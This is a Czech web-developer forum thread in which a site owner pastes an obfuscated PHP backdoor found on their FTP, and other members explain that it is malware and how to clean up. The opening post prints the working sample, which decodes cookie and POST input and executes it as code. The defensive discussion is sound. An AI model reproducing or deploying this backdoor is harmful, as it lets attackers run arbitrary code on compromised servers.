(8 hodnocení)
na ftp se nejak objevuji soubory s +- timto obsahem, pokazde je to trosku jine
<?php
$sxjoszi = 'cs9ket31io*2py7xf46n#rul\'-g50_8vHbdam';$qryffa = Array();$qryffa[] = $sxjoszi[0].$sxjoszi[21].$sxjoszi[4].$sxjoszi[35].$sxjoszi[5].$sxjoszi[4].$sxjoszi[29].$sxjoszi[16].$sxjoszi[22].$sxjoszi[19].$sxjoszi[0].$sxjoszi[5].$sxjoszi[8].$sxjoszi[9].$sxjoszi[19];$qryffa[] = $sxjoszi[28].$sxjoszi[6].$sxjoszi[2].$sxjoszi[34].$sxjoszi[0].$sxjoszi[33].$sxjoszi[14].$sxjoszi[0].$sxjoszi[25].$sxjoszi[2].$sxjoszi[33].$sxjoszi[7].$sxjoszi[16].$sxjoszi[25].$sxjoszi[17].$sxjoszi[2].$sxjoszi[6].$sxjoszi[33].$sxjoszi[25].$sxjoszi[30].$sxjoszi[4].$sxjoszi[0].$sxjoszi[18].$sxjoszi[25].$sxjoszi[35].$sxjoszi[30].$sxjoszi[28].$sxjoszi[14].$sxjoszi[30].$sxjoszi[34].$sxjoszi[28].$sxjoszi[27].$sxjoszi[33].$sxjoszi[17].$sxjoszi[16].$sxjoszi[11];$qryffa[] = $sxjoszi[32].$sxjoszi[10];$qryffa[] = $sxjoszi[20];$qryffa[] = $sxjoszi[0].$sxjoszi[9].$sxjoszi[22].$sxjoszi[19].$sxjoszi[5];$qryffa[] = $sxjoszi[1].$sxjoszi[5].$sxjoszi[21].$sxjoszi[29].$sxjoszi[21].$sxjoszi[4].$sxjoszi[12].$sxjoszi[4].$sxjoszi[35].$sxjoszi[5];$qryffa[] = $sxjoszi[4].$sxjoszi[15].$sxjoszi[12].$sxjoszi[23].$sxjoszi[9].$sxjoszi[34].$sxjoszi[4];$qryffa[] = $sxjoszi[1].$sxjoszi[22].$sxjoszi[33].$sxjoszi[1].$sxjoszi[5].$sxjoszi[21];$qryffa[] = $sxjoszi[35].$sxjoszi[21].$sxjoszi[21].$sxjoszi[35].$sxjoszi[13].$sxjoszi[29].$sxjoszi[36].$sxjoszi[4].$sxjoszi[21].$sxjoszi[26].$sxjoszi[4];$qryffa[] = $sxjoszi[1].$sxjoszi[5].$sxjoszi[21].$sxjoszi[23].$sxjoszi[4].$sxjoszi[19];$qryffa[] = $sxjoszi[12].$sxjoszi[35].$sxjoszi[0].$sxjoszi[3];foreach ($qryffa[8]($_COOKIE, $_POST) as $lselej => $leocxv){function nlwinov($qryffa, $lselej, $pxxuie){return $qryffa[7]($qryffa[5]($lselej . $qryffa[1], ($pxxuie / $qryffa[9]($lselej)) + 1), 0, $pxxuie);}function txzxf($qryffa, $zuwzfv){return @$qryffa[10]($qryffa[2], $zuwzfv);}function wuvoc($qryffa, $zuwzfv){$oqnjucc = $qryffa[4]($zuwzfv) % 3;if (!$oqnjucc) {$fexlo = $qryffa[0]; $wszhocr = $fexlo("", $zuwzfv[1]($zuwzfv[2]));$wszhocr();exit();}}$leocxv = txzxf($qryffa, $leocxv);wuvoc($qryffa, $qryffa[6]($qryffa[3], $leocxv ^ nlwinov($qryffa, $lselej, $qryffa[9]($leocxv))));}
setkal se s tim nekdo? diky
Zavirovany web, podivne php soubory
17.02.2020
15:32
Milan Hornik
Co nabízím
scriptovani v php + mysql
| Web | www.timeland.cz |
| Příspěvky |
242
|
| Členem od |
27.04.2013
|
Co se právě děje na Webtrhu?
- Štěpán Němejc poptává: PHP - napojení na linkedIn příspěvky
- Keeehi poptává: Vývoj interního systému pro studentský spolek
- BABA Tumise s.r.o. poptává: Hledá se zkušený Wordpress Elementor, kodér
17.02.2020
15:54
obchodniuspech
Co nabízím
Marketing, tvorba internetových stránek a obchodů, SEO, zvyšování ziskovosti internetových obchodů, netradiční a efektivní řešení.
| Web | www.obchodniuspech.cz |
| Příspěvky |
785
|
| Členem od |
05.11.2011
|
to je zasifrovany, nekde tam bude nejaky odkaz na ty funkce a promenne, v zasade to nejspis vkladat do webu nejaky bordel, ktery se nasledne zobrazi navstevnikum webu
Jedine spravne reseni je tady bud zaloha, nebo/a zmena vsech hesel k ftp, databazi, etc. a nedavat ho nekomu, kdo tomu nerozumi! :)
Samozrejme nejmene pracna je zaloha, pokud na webu denne nepribyvaji nejaky zaznamy apod.
Pokud budete mit zajem a nikoho na to nenajdete, ozvete se, zkusim se na to podívat :)
(0 hodnocení)
S tím se setkal asi každý, kdo viděl zavirovaný web. To je klasická obfuskace, abyste snadno nezjistil, co vir dělá. Obnovit ze zálohy. Změnit hesla, vyhodit blbce, co k tomu má přístup. Pokud se tam vir dostal přes zranitelný systém, tak zjistit odkud... často bývají neaktualizované eshopy a cms... nebo napište, mě kolegovi výše...
Je to klasicke zavirovani pres nejakou diru v CMS, diru v serveru apod. Odvirovani je celkem peklo, ale jde to, delal jsem to na svem serveru uz mnohokrat. Zalezi jak moc slozity ten skodlivy kod je.
Nekdy se replikuje ve stejne podobe, nekdy infikuje dalsi souboru, nekdy se pokazde meni ale zustava tam vysledovatelny patern. Nekdy je to jeste horsi.
1. stopnout web, vyhledat vsechny spatne soubory a napadnute souboru a ty odmazat, pripadne vymazat skodlivy kod, pokud neni nezavirovana zaloha (bacha i to co vypada nezavirovane muze zavirovane byt, obcas se neco ukryva mezi obrazky apod. = nejdriv na ten pattern otestovat i tu zalohu).
2. pokud je to nejake CMS typu WordPress tak aktualizovat na nejnovejsi verzi, pluginy a sablony to same. Pokud jsou pouzite nejake urkadene sablony nebo pluginy, tak odmazat nebo proste zaplatit a nahrat legalni verzi. (vzhledem k casu na odvirovani se nikdy nevyplati to krast ani pro testovaci vyvoj)
3. zmenit vsechna hesla a pristupy k FTP, DB, administraci
4. Sledovat web jestli se neco neobjevi. Pozor chytrejsi kody vytvari nove soubory se starym datumem
5. Vyplati se pres php.ini uplne zakazat ereg.
6. Casto tyhle kody slouzi k spamovani, nebo DDos utoky, takze mozna bude potreba projit ruzne servery a po odvirovani pozadat o odstraneni z blacklistu.
Pokud je to promenlivy pattern co se meni pod rukama tak good luck, to chce hodne dobreho linuxare co umi delat dobre regularni vyrazy.
Tenhle kod na prvni pohled vypada jako problematictejsi, bude menit jak vypada, na zacatku se zmeni promena a pres ni se pak prekoduje cely text. Ale videl jsem uz i horsi a mnohem obtizneji odstranitele
17.02.2020
16:21
Wladass
Co nabízím
Nabízím poradenství v oblasti domén a obzvláště těch expirovaných. Nabízím jakékoliv úpravy redakčního systému WordPress i jiných systémů.
| Web | www.hostingy.net |
| Příspěvky |
3 639
|
| Členem od |
12.04.2010
|
Googli a nebo si dej do poptávek, aby ti to někdo odviroval.
Vyčistit db, odstranit bordel z FTP a souborů, vyhodit adminer pokud tam je a je to.
Pravidelně aktualizovat, nepoužívat nulled šablony a scripty. Používat jen ověřené pluginy.